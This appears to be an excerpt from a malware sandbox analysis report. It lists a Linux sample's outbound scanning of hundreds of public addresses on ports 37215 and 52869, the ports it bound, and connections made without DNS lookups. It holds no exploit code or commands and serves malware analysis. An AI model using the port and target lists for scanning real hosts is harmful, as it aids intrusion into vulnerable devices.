Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.151.161.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.198.188.21:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.105.134.146:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.238.98.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.224.227.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.254.124.176:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.73.18.106:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.211.87.202:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.54.0.136:37215
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.162.182.211:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.159.97.156:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.165.220.3:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.158.16.183:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.223.144.243:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.13.15.235:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.11.172.61:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.1.211.200:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.145.27.236:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.154.144.180:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.248.234.8:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.55.253.188:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.44.121.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.99.146.40:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.136.115.58:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.234.187.157:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.175.201.208:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.227.118.253:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.16.111.46:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.9.197.99:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.208.122.181:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.146.89.26:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.72.197.166:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.194.211.211:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.173.238.227:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.191.224.255:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.6.14.72:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.124.253.181:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.67.192.196:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.156.242.231:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.106.3.34:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.213.167.54:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.193.3.93:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.38.10.185:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.231.92.28:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.125.222.179:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.33.198.252:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.216.130.87:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.18.170.64:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.249.24.50:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.86.31.191:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.204.185.144:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.213.52.254:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.77.54.219:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.158.177.82:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.87.243.224:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.169.172.27:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.243.195.16:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.185.197.239:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.64.189.181:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.137.41.25:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.81.237.58:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.97.80.172:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.139.99.0:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.197.91.27:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.195.188.149:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.57.44.120:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.198.10.40:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.208.116.44:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.93.89.44:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.127.87.145:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.255.186.34:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.131.13.199:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.148.196.120:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.139.176.167:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.73.38.254:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.152.188.213:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.210.168.243:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.31.22.84:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.160.221.114:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.16.40.90:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.140.207.115:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.124.7.128:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.121.219.146:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.102.86.30:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.159.46.70:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.142.31.94:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.52.146.103:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.80.222.14:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.194.254.18:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.237.97.187:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.214.96.32:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.255.230.255:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.149.90.146:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.250.23.136:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.70.13.249:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.45.195.108:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.177.122.108:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.4.124.204:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.53.56.62:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.69.35.244:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.196.208.155:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.196.53.216:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.181.168.80:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.49.79.34:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.37.58.115:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.119.98.190:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.108.129.132:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.22.151.220:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.254.127.222:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.255.253.57:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.107.145.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.37.177.220:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.19.77.29:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.155.238.148:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.197.105.116:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.141.155.41:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.17.112.219:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.25.5.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.231.132.6:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.108.144.107:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.255.78.254:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.22.178.63:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.111.95.204:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.144.67.240:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.121.199.51:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.82.131.30:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.53.227.197:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.30.97.10:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.63.179.19:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.45.49.32:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.32.135.28:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.22.47.205:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.127.255.62:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.146.99.31:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.81.154.104:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.90.84.205:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.124.73.181:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.253.215.86:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.49.34.216:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.57.206.61:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.107.178.227:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.84.150.211:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.65.146.55:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.17.83.108:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.232.74.21:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.181.29.9:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.17.128.59:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.166.31.151:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.240.74.117:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.151.2.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.6.136.228:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.78.51.239:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.39.83.137:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.114.228.136:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.180.214.200:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.21.246.33:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.94.167.171:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.104.225.117:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.247.237.124:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.162.76.138:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.67.162.167:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.191.150.111:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.201.36.95:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.90.156.89:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.15.64.47:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.252.228.126:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.100.107.191:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.76.252.138:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.131.249.14:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.135.207.106:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.111.62.109:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.3.115.159:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.72.79.184:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.253.252.29:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.128.84.40:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.44.188.197:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.25.185.132:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.102.99.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.64.60.76:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.107.56.80:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.146.101.119:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.236.107.51:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.231.199.70:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.35.169.247:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.75.146.105:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.215.81.124:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.241.19.158:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.242.200.165:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.218.195.193:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.244.5.251:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.231.47.141:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.228.158.68:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.97.68.122:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.158.142.124:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.82.54.131:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.74.157.150:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.19.140.89:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.130.194.46:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.122.66.121:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.162.32.55:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.182.138.234:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.59.133.78:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.164.242.74:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.198.87.239:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.162.211.186:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.73.117.20:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.97.76.168:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.3.34.150:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.21.131.9:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.181.116.190:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.118.119.165:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.253.59.245:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.106.87.45:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.163.189.245:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.13.189.62:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.159.166.51:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.45.51.31:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.230.175.45:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.91.32.76:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.6.135.222:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.75.64.27:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.154.244.2:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.151.247.76:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.20.168.103:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.167.63.155:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.77.138.20:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.64.158.163:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.78.10.78:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.183.145.213:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.100.106.223:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.185.168.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.217.142.98:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.66.85.82:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.134.31.129:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.203.44.226:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.18.152.117:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.189.93.204:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.49.41.87:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.26.5.73:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.241.10.126:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.52.81.148:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.163.18.232:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.214.118.145:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.147.42.75:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.30.36.8:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.231.42.44:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.55.229.23:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.38.235.241:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.113.51.194:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.10.143.11:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.203.65.45:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.91.64.134:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.245.103.121:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.32.168.140:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.21.111.137:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.25.43.174:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.222.224.229:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.82.88.120:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.74.76.150:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.72.212.81:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.117.174.96:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.219.98.109:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.149.159.209:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.73.69.8:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.65.217.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.111.126.67:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.165.105.0:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.210.196.239:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.196.24.52:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.114.13.168:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.126.76.223:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.183.141.70:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.88.156.13:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.190.19.64:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.29.161.128:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.199.29.191:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.174.38.251:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.77.248.77:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.98.125.117:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.232.43.105:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.0.45.169:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.76.55.184:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.193.184.252:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.81.19.234:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.62.30.3:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.73.104.152:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.221.200.180:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.71.58.234:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.242.224.186:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.218.191.121:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.32.255.219:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.217.12.130:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.4.148.44:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.73.136.54:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.120.119.18:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.94.203.34:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.56.3.196:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.4.33.107:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.6.240.38:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.192.164.201:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.170.104.87:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.149.179.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.185.17.177:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.148.17.29:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.78.219.192:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.91.123.160:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.189.47.231:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.139.248.198:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.241.84.146:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.113.127.189:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.82.221.141:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.197.49.189:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.126.237.61:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.230.17.244:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.237.153.48:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.46.89.30:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.112.90.22:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.206.21.11:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.30.119.182:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.224.42.0:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.5.113.156:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.68.230.75:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.78.230.33:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.106.161.70:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.240.11.242:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.111.196.136:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.69.5.92:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.5.166.64:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.107.208.59:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.194.53.56:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.36.133.4:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.226.222.138:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.120.246.118:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.238.61.192:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.120.60.144:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.132.227.19:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.140.38.14:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.211.166.155:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.73.134.179:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.137.110.61:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.30.157.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.61.91.224:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.232.153.210:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 185.15.149.70:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.57.42.68:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 91.20.124.181:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.255.134.84:52869
Source: global traffic	TCP traffic: 192.168.2.23:24599 -> 45.148.75.119:52869

Source: /tmp/MePwVTNRoA (PID: 5240)	Socket: 0.0.0.0::22
Source: /tmp/MePwVTNRoA (PID: 5240)	Socket: 0.0.0.0::0
Source: /tmp/MePwVTNRoA (PID: 5246)	Socket: 0.0.0.0::0
Source: /tmp/MePwVTNRoA (PID: 5246)	Socket: 0.0.0.0::23
Source: /tmp/MePwVTNRoA (PID: 5246)	Socket: 0.0.0.0::53413
Source: /tmp/MePwVTNRoA (PID: 5246)	Socket: 0.0.0.0::80
Source: /tmp/MePwVTNRoA (PID: 5246)	Socket: 0.0.0.0::52869
Source: /tmp/MePwVTNRoA (PID: 5246)	Socket: 0.0.0.0::37215
Source: /usr/sbin/sshd (PID: 5286)	Socket: [::]::22

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 37.0.9.202
Source: unknown	TCP traffic detected without corresponding DNS query: 197.170.182.211
Source: unknown	TCP traffic detected without corresponding DNS query: 197.202.211.211
Source: unknown	TCP traffic detected without corresponding DNS query: 156.173.156.3
Source: unknown	TCP traffic detected without corresponding DNS query: 197.12.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 41.79.199.188
Source: unknown	TCP traffic detected without corresponding DNS query: 197.173.103.8
Source: unknown	TCP traffic detected without corresponding DNS query: 197.29.36.203
